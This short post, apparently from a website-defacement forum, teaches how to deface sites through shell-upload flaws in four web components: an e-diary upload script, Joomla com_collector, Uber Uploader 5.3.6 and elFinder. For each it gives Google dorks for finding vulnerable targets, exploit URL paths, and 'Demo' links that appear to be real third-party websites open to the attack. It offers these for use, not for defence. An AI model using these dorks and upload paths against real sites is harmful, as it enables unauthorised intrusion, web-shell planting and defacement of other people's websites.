Deface with Shell Upload

If you want to carry out a defacement very easily, here I will share how to deface easily by taking advantage of bugs in shell upload.

1. Shell Upload “template.php?component=”

Dork: inurl:mdbtemplate/mytemplate
POC/Exploit: http://localhost/e-diary/makehtml/fileupload.php
Demo:
http://www.old.crcn.in.th/e-diary/makeht…upload.php
http://www.ped.si.mahidol.ac.th/e-diary/…upload.php



2. Joomla com_collector upload shell

Dork : inurl:index.php?option=com_collector
POC/Exploit: http://localhost/[path]/index.php?option=com_collector&view=filelist&tmpl= component&folder=&type=1
Demo :
http://www.getravel.gr/site/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://www.immortal-thor.com//index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://belmuzfond.com/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
http://www.moepooladfar.org/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1

3. Uber Uploader 5.3.6 Vuln Upload

Dork:
“Powered By Uber Uploader”
allinurl: uu_file_upload.php
allinurl: uber_uploader_file.php
POC : http://[localhost]/uploads/your file
Demo :
http://tv.fuerzw.de/upload/uu_file_upload.php
http://www.cptmkt.com/uu_file_upload.php

4. elFinder Shell Upload Vulnerability

DORK: inurl:/elfinder/
intitle:index of 
POC: http://localhost/Patch/elfinder/elfinder.php.html or elfinder.php